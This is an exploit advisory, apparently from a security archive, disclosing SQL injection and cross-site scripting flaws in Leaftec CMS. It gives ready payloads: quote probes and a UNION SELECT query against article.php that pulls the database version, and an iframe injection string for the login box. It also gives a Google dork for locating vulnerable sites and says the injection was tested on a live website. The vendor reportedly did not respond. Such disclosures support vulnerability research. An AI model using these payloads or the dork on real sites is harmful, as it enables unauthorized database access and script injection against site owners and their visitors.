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Leaftec CMS SQL Injection / Cross Site Scripting

Leaftec CMS SQL Injection / Cross Site Scripting
Posted Mar 28, 2010
Authored by Valentin Hoebel

Leaftec CMS suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | ff2b35c298587032887369a7ad902eb6

Leaftec CMS SQL Injection / Cross Site Scripting

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# Exploit Title: leaftec cms multiple vulnerabilities
# Date: 21.03.2010
# Author: Valentin Höbel
# Version:
# Tested on: Debian etch
# CVE :
# Code :



:: General information
:: leaftec cms multiple vulnerabilities discovered
:: by Valentin Höbel
:: valentin@xenuser.org

:: Product information
:: Name = leaftec cms
:: Vendor = leaftec
:: Vendor Website = http://www.leaftec.de/
:: About the product = http://www.leaftec.de/serv_cms.php
:: Affected versions =
:: Google dork: e.g. "© 2006 leaftec Design"


:: Vulnerabilities

#1 SQL Injection
Sadly the CMS is not available for free download but some German companies are using it.
leaftec cms contains a blog feature which displays written content, file: article.php.

Vulnerable URL:
http://www.some-cool-domain.tld/article.php?id=XX

Examples for testing and injecting SQL stuff:
http://www.some-cool-domain.tld/article.php?id='
http://www.some-cool-domain.tld/article.php?id="
http://www.some-cool-domain.tld/article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version()),7--
(Tested on a live website using leaftec cms.)
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#2 XSS / HTML Code Injection
Several parts of the CMS allow HTML and Java Script code injection, e.g. the login box.
After submitting the form the cms puts a red border around the login and password field but
also implements the injected code into the website.

Example for HTML code:
"><iframe src=http://www.google.de></iframe>
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:: Additional information
:: Vendor contacted = 21.03.2010
:: Vulnerabilities fixed = no reply received
:: Solution = Upgrade to version XX or higher if available

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